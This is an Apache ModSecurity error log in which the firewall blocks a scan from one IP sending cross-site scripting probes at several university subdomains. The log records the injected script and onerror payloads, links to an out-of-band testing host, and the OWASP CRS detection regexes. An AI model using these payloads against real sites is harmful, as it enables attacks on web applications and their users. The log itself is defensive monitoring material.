[Tue Aug 29 11:51:28.920465 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAlIBisAAAAn"]
[Tue Aug 29 11:51:28.933747 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAnDFzQAAAAM"]
[Tue Aug 29 11:51:28.936458 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAkr0GoAAAAC"]
[Tue Aug 29 11:51:28.937199 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAm80P0AAAAF"]
[Tue Aug 29 11:51:28.938501 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAmQ-yEAAAAb"]
[Tue Aug 29 11:51:28.941333 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAnTlKwAAAAA"]
[Tue Aug 29 11:51:28.945331 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAnHQe4AAAAT"]
[Tue Aug 29 11:51:29.550831 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAnB5V4AAAAJ"]
[Tue Aug 29 11:51:29.557009 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAmHd-kAAAAz"]
[Tue Aug 29 11:51:29.560355 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UcCo-f0AAAnDFzUAAAAM"]
[Tue Aug 29 11:51:29.563654 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAnHQe8AAAAT"]
[Tue Aug 29 11:51:29.567313 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAm7m-QAAAAE"]
[Tue Aug 29 11:51:29.573665 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UcCo-f0AAAm@5yoAAAAH"]
[Tue Aug 29 11:51:29.626916 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAkr0GwAAAAC"]
[Tue Aug 29 11:51:29.686655 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UcCo-f0AAAmNp5cAAAAQ"]
[Tue Aug 29 11:51:30.573379 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAmLPTsAAAAN"]
[Tue Aug 29 11:51:30.578176 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAnIlhYAAAAV"]
[Tue Aug 29 11:51:30.578252 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAmNp5gAAAAQ"]
[Tue Aug 29 11:51:30.579528 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAnTlK4AAAAA"]
[Tue Aug 29 11:51:30.581604 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UsCo-f0AAAfWOFgAAAAL"]
[Tue Aug 29 11:51:30.607823 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAnHQfEAAAAT"]
[Tue Aug 29 11:51:30.608147 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAm80QAAAAAF"]
[Tue Aug 29 11:51:30.611736 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAkyyGEAAAAW"]
[Tue Aug 29 11:51:30.617118 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAlUljgAAAA0"]
[Tue Aug 29 11:51:30.619755 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAkr0G4AAAAC"]
[Tue Aug 29 11:51:30.619970 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAnIlhcAAAAV"]
[Tue Aug 29 11:51:30.677458 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAnDFzgAAAAM"]
[Tue Aug 29 11:51:30.711316 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAm80QEAAAAF"]
[Tue Aug 29 11:51:30.750630 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAm80QIAAAAF"]
[Tue Aug 29 11:51:30.751496 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAnTlLEAAAAA"]
[Tue Aug 29 11:51:30.755151 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAfWOFoAAAAL"]
[Tue Aug 29 11:51:31.547668 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAmQ-yYAAAAb"]
[Tue Aug 29 11:51:31.549205 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAm80QMAAAAF"]
[Tue Aug 29 11:51:31.551208 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAnB5WIAAAAJ"]
[Tue Aug 29 11:51:31.551648 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAnDFzoAAAAM"]
[Tue Aug 29 11:51:31.551793 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15U8Co-f0AAAm@5y0AAAAH"]
